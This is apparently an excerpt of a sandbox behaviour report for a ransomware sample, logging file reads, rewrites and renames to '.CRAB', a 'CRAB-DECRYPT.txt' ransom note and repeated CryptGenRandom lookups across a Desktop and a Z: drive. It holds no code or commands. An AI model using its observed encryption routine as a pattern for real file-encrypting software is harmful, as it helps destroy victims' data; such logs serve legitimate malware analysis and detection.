| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, size = 1048576, size_out = 8723 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, size = 8736 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif, destination_filename = C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, size = 1048576, size_out = 60214 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, size = 60224 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4, destination_filename = C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4.CRAB |
|
1 | |
|
For performance reasons, the remaining 2611 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0xe34
2827
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = Z:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = Z:\ggNuzUYFd.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ggNuzUYFd.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\QbYwYSoMD3beKw.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\QbYwYSoMD3beKw.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\fUHonlL.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\fUHonlL.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\brgVKnP3IVGPPX.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\brgVKnP3IVGPPX.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\PCEJlbmpwZ68QNsWdvWo.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\PCEJlbmpwZ68QNsWdvWo.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\zP0nKisr4oLuznV8Y.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\zP0nKisr4oLuznV8Y.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\DR2HdhXM7A.xls, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\DR2HdhXM7A.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\0uoW8iDiO9C0q.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\0uoW8iDiO9C0q.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ctwtFUQdhyq9B0.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ctwtFUQdhyq9B0.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\wwWTiMqjx6hY7AqmcQRC.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\wwWTiMqjx6hY7AqmcQRC.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZluEZ8VfU.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ZluEZ8VfU.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\AeKHMJrNCDYUq.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\AeKHMJrNCDYUq.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\usc0a0c3QarsfV.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\usc0a0c3QarsfV.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Ft1MOn1CIc.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Ft1MOn1CIc.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\1taL0c72JXkGj.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\1taL0c72JXkGj.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\EmullYJgNTq8y.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\EmullYJgNTq8y.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\fJJNxlZPFcIOL7N8L.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\fJJNxlZPFcIOL7N8L.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\hjOwYAb7YQ2odlEyn.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\hjOwYAb7YQ2odlEyn.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZcRis.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ZcRis.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\pEtobMGPdVk4C2adw.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\pEtobMGPdVk4C2adw.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sEi0K8sZnqEl5.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\sEi0K8sZnqEl5.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\oXr639hN3x86Bhd.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\oXr639hN3x86Bhd.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\XmnJxoBkEp9WD4cyN.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\XmnJxoBkEp9WD4cyN.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\KtzEQVEZQWFLdAY3Qn.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\KtzEQVEZQWFLdAY3Qn.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sbZAE.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\sbZAE.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ukO9D2qllnBsxnQ.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ukO9D2qllnBsxnQ.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\UsVrBfwU9tuC5KFqX2K.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\UsVrBfwU9tuC5KFqX2K.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\gr07JV38A.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\gr07JV38A.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\BhX74jJaOIdhyhcSe5G9.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\BhX74jJaOIdhyhcSe5G9.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\xQ6SLR9y03J4ITfu7P.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\xQ6SLR9y03J4ITfu7P.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\4z3uag.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\4z3uag.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\BokNObz8UcZzwf.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\BokNObz8UcZzwf.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\rYZw8NqY13.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\rYZw8NqY13.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Kn7qhmeLrMy5AdqLU92.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Kn7qhmeLrMy5AdqLU92.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sDKhau.doc, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
